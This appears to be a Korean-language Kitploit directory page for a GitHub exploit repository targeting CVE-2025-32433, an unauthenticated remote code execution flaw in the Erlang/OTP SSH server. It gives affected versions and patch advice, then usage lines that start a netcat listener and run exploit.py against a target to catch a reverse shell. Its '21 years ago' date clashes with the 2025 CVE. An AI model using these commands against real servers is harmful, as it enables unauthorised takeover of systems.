Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mrdreamreal/cve-2025-32433
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Summary and Attack Overview

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32433

CVE-2025-32433 요약 및 공격 개요

CVE-2025-32433은 2025년 4월 16일에 공개된 Erlang/OTP SSH 서버의 심각한 인증 없는 원격 코드 실행(RCE) 취약점입니다. Erlang/OTP SSH는 다양한 분산 및 통신 애플리케이션에서 사용되는 라이브러리입니다. 이 결함은 SSH 프로토콜 메시지를 부적절하게 처리하는 데서 발생합니다. 서버가 정상적인 인증 순서를 강제하지 못해, 공격자가 인증 이전에 특수하게 조작된 SSH 메시지를 보낼 수 있습니다. 이를 통해 공격자는 서버에서 임의의 Erlang 코드를 주입하고 실행할 수 있습니다​ nvd.nist.gov ​ offsec.com . 실질적으로, 이는 취약한 Erlang/OTP SSH 서버(종종 root 권한으로 실행됨)에 네트워크 접근이 가능한 공격자가 자격 증명 없이 리버스 셸을 트리거하거나 명령을 실행하여 전체 시스템을 장악할 수 있음을 의미합니다​ nvd.nist.gov ​ offsec.com . 이 취약점은 CVSS 점수 10.0(최대 심각도)으로 평가되었습니다​ offsec.com .

영향을 받는 버전은 OTP-27.3.3, OTP-26.2.5.11 또는 OTP-25.3.2.20 미만의 모든 Erlang/OTP 릴리스입니다(패치된 버전)​ nvd.nist.gov ​ offsec.com . 영향을 받는 시스템에는 Erlang 기반 SSH 데몬(OpenSSH와 혼동하지 말 것)을 실행하는 Linux 서버나 어플라이언스가 자주 포함됩니다. 중요한 점은 Linux/BSD의 기본 OpenSSH 서버는 취약하지 않다는 것입니다​ offsec.com . 사용자는 노출된 모든 Erlang/OTP SSH 서버가 영향을 받는 것으로 간주하고, 공식 패치를 적용하거나 즉시 SSH 서비스를 비활성화해야 합니다.

공격은 SSH 연결을 시작한 후 SSH 메시지 시퀀스를 순서에 맞지 않게 전송하는 방식으로 작동합니다. :

사용법:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

예:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

도구 다운로드